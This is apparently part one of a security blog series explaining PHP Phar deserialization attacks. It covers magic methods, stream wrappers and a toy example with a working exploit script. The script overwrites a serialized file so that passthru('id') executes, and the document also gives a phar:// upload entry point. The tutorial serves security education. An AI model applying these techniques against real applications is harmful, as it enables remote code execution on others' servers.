Exploiting PHP Phar Deserialization Vulnerabilities: Part 1

Understanding the Inner-Workings

INTRODUCTION

Phar deserialization is a relatively new vector for performing code reuse attacks on object-oriented PHP applications and it was publicly disclosed at Black Hat 2018 by security researcher Sam Thomas. Similar to ROP (return-oriented programming) attacks on compiled binaries, this type of exploitaton is carried through PHP object injection (POI), a form of property-oriented programming (POP) in the context of object-oriented PHP code.

Due to its novelty, this kind of attack vector gained increased attention from the security community in the past few months, leading to the discovery of remote code execution vulnerabilities in many widely deployed platforms, such as:

Throughout this series, we aim to describe Phar deserialization’s inner workings, with a hands-on approach to exploit PhpBB 3.2.3, a remote code execution vulnerability in the PhpBB platform.

ON PHAR FILES, DESERIALIZATION, AND PHP WRAPPERS

To better understand how this vector works, we need a bit of a context regarding what Phar files are, how deserialization attacks work, what a PHP wrapper is, and how the three concepts interrelate.

What is a Phar File?

Phar (PHp ARchive) files are a means to distribute PHP applications and libraries by using a single file format (similar to how JAR files work in the Java ecosystem). These Phar files can also be included directly in your own PHP code. Structurally, they’re simply archives (tar files with optional gzip compression or zip-based ones) with specific parts described by the PHP manual as follows:

<?php __HALT_COMPILER();

Understanding deserialization vulnerabilities

Serialization is the process of storing an object’s properties in a binary format, which allows it to be passed around or stored on a disk, so it can be unserialized and used at a later time.

In PHP, the serialization process only saves an object’s properties, its class name, but not its methods (hence the POP acronym). This proves to be a smart design choice from a security perspective, except there’s one particularity that makes the deserialization process dangerous: the so-called magic methods.

These functions are specific to every PHP class, have a double-underscore prefixed name and get implicitly called on certain runtime events. By default, most of them do nothing and it’s the developer’s job to define their behavior. In our case, the following two are worth mentioning, since they’re the only ones that get triggered on Phar deserialization:

Let’s look at how a snippet of vulnerable code is exploited using this vector on the following dummy example:

# file: dummy_class.php
<?php
/* Let's suppose some serialized data is written on the disk with 
loose file permissions and gets read at a later time */
class Data {
  # Some default data
  public $data = array("theme"=>"light", "font"=>12);
  public $wake_func = "print_r";
  public $wake_args = "The data has been read!\n";

  # magic method that is called on deserialization
  public function __wakeup() {
    call_user_func($this->wake_func, $this->wake_args);
  }
}

# acting as main the conditional below gets executed only when file is called directly
if (basename($argv[0]) == basename(__FILE__)) {
  
  # Serialize the object and dump it to the disk; also free memory
  $data_obj = new Data();
  $fpath = "/tmp/777_file";

  file_put_contents($fpath, serialize($data_obj));
  echo "The data has been written.\n";
  unset($data_obj);

  # Wait for 60 seconds, then retrieve it 
  echo "(sleeping for 60 seconds…)\n";
  sleep(60);

  $new_obj = unserialize(file_get_contents($fpath));
}

We notice that, upon deserialization, the __wake method dynamically calls the print_r function pointed by the object’s $wake_func and $wake_args properties. A simple run yields the following output:

$ php dummy_class.php 
The data has been written.
(sleeping for 60 seconds…)
The data has been read!

But what if, in the 60-second timespan, we manage to replace the serialized data with our own to get control of the function called upon in deserialization? The following code describes how to accomplish this:

# file: exploit.php
<?php

require('dummy_class.php');
# Using the existing class definition, we create a crafted object and overwrite the
# existing serialized data with our own
$bad_obj = new Data();
$bad_obj->wake_func = "passthru";
$bad_obj->wake_args = "id";
$fpath = "/tmp/777_file";

file_put_contents($fpath, serialize($bad_obj));

Running the above snippet in the 60-second timespan, while dummy_class.php is waiting, grants us a nice code execution, even though the source of dummy_class.php hasn’t changed. The behavior results from the serialized object’s dynamic function call, changed through the object’s properties to passthru("id").

$ php dummy_class.php
The data has been written.
(sleeping for 60 seconds…)
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)

In the context of PHP object injection (POI/deserialization) attacks, these vulnerable sequences of code bear the name of gadgets or POP chains.

PHP Wrappers – Wrapping it Together

According to the PHP documentation, streams are the way of generalizing file, network, data compression, and other operations that share a common set of functions and uses. PHP wrappers take the daunting task of handling various protocols and providing a stream interface with the protocol’s data. These streams are usually used by filesystem functions such as fopen(), copy(), and filesize().

A stream is accessed using a URL-like syntax scheme: wrapper://source. The most usual stream interfaces provided by PHP are:

The stream type of interest to us is (*drum roll*) the phar:// wrapper. A typical declaration has the form of phar://full/or/relative/path, and has two interesting properties:

Here is a list of filesystem functions that trigger phar deserialization:

copy                file_exists         file_get_contents   file_put_contents   
file                fileatime           filectime           filegroup           
fileinode           filemtime           fileowner           fileperms           
filesize            filetype            fopen               is_dir              
is_executable       is_file             is_link             is_readable         
is_writable         lstat               mkdir               parse_ini_file      
readfile            rename              rmdir               stat                
touch               unlink              

How to Carry Out a Phar Deserialization Attack

At this point, we have all the ingredients for a recipe for exploitation. The required conditions for exploiting a Phar deserialization vulnerability usually consist of:

  1. The presence of a gadget/POP chain in an application’s source code (including third-party libraries), which allows for POI exploitation; most of the time, these are discovered by source code inspection
  2. The ability to include a local or remote malicious Phar file (most commonly, by file upload and relying on ployglots)
  3. An entry point, where a filesystem function gets called on a user-controlled phar wrapper, also discovered by source code inspection

For example, think of a poorly sanitized input field for setting a profile picture via an URL. The attacker sets the value of the input to the previously uploaded Phar/polyglot, rather than a http:// address (say phar://../uploads/phar_polyglot.jpg); on server-side, the backend performs a filesystem call on the provided wrapper, such as verifying if the file exists on the disk by calling file_exists("phar://../uploads/phar_polyglot.jpg"). At this very moment, the uploaded Phar’s metadata is unserialized, taking advantage of the gadgets/POP chains to complete the exploitation chain.

In part two of this blog series, you'll see how all of these concepts apply by getting our hands dirty and exploiting a remote code execution in PhpBB 3.2.3 (CVE-2018-19274).

Written by Daniel Timofte

limit
3